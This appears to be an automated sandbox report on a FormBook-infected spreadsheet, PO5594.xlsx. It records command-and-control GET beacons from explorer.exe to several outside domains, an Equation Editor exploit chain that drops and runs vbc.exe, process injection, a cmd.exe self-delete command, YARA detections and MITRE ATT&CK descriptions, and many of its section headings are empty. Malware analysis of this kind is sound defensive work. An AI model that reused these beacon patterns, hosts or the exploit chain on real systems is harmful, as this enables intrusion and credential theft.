00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF^QFQGqQF^QFrvQF.W@QFRichQFPELe:V\0p@tp\|.textZ\ `.rdatap`@@.data8r@.ndataP.rsrcx@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	104.21.75.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2021 09:28:15.177232027 CET	315	OUT	GET /ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 HTTP/1.1 Host: www.spacex-live.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 2, 2021 09:28:15.206080914 CET	316	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 02 Nov 2021 08:28:15 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Tue, 02 Nov 2021 09:28:15 GMT Location: https://www.spacex-live.net/ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Or3FV13v2reNYN%2BWp%2F8vpijU8YUbETOgTka3tg7j%2FeZQv8MrFazDzgubmUsk0Z%2BUmvmnRtuyBlKbzhU3UmYTTucW83rZgvHdwXFjE%2F967z36ZLASYwl%2FRekDeZWqQJOXG1LZaPdx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a7bfd02eaeb4ee6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49168	66.29.132.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2021 09:28:25.442976952 CET	316	OUT	GET /ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1 Host: www.schittstore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 2, 2021 09:28:25.625227928 CET	318	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Tue, 02 Nov 2021 08:28:25 GMT server: LiteSpeed location: https://www.schittstore.com/ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0 x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49169	75.2.60.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2021 09:28:30.750937939 CET	318	OUT	GET /ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 HTTP/1.1 Host: www.metanetgateway.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 2, 2021 09:28:31.052886963 CET	319	IN	HTTP/1.1 301 Moved Permanently access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept access-control-allow-methods: * access-control-allow-origin: * cache-control: public, max-age=0, must-revalidate content-length: 52 content-type: text/plain date: Tue, 02 Nov 2021 04:27:09 GMT age: 14481 location: https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0 x-nf-request-id: 01FKFW76VGRSKD54DKFQGMATP0 server: Netlify Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 65 74 61 6e 65 74 67 61 74 65 77 61 79 2e 63 6f 6d 2f 64 64 7a 77 2f 0a Data Ascii: Redirecting to https://www.metanetgateway.com/ddzw/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49170	162.241.253.231	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 2, 2021 09:28:36.335340977 CET	320	OUT	GET /ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 HTTP/1.1 Host: www.sarahannsartstudio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 2, 2021 09:28:38.020910978 CET	321	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 02 Nov 2021 08:28:37 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0 host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 0 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS

Code Manipulations

Statistics

Behavior

• EXCEL.EXE
• EQNEDT32.EXE
• vbc.exe
• vbc.exe
• explorer.exe
• NETSTAT.EXE
• cmd.exe

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2124 Parent PID: 596

General

Start time:	09:26:16
Start date:	02/11/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f790000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Written

Show Windows behavior

General

Start time:	09:26:37
Start date:	02/11/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Show Windows behavior

Registry Activities

Key Created

Analysis Process: vbc.exe PID: 2856 Parent PID: 2580

General

Start time:	09:26:45
Start date:	02/11/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	292696 bytes
MD5 hash:	11CBFA99FB5EBE8C09674E79B9834D96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476798938.0000000002F90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

General

Start time:	09:26:46
Start date:	02/11/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	292696 bytes
MD5 hash:	11CBFA99FB5EBE8C09674E79B9834D96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.469999141.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507748389.00000000002F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.472000936.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.469326544.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507885297.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

File Activities

File Read

Analysis Process: explorer.exe PID: 1764 Parent PID: 1868

General

Start time:	09:26:51
Start date:	02/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.493026638.0000000009725000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.499945438.0000000009725000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

File Activities

Analysis Process: NETSTAT.EXE PID: 2076 Parent PID: 1764

General

Start time:	09:27:04
Start date:	02/11/2021
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0xd30000
File size:	27136 bytes
MD5 hash:	32297BB17E6EC700D0FC869F9ACAF561
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.666335831.00000000003A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.666274023.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.666207492.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

File Activities

File Read

Analysis Process: cmd.exe PID: 2036 Parent PID: 2076

General

Start time:	09:27:07
Start date:	02/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4ab30000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Deleted

Disassembly

Code Analysis

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PO5594.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

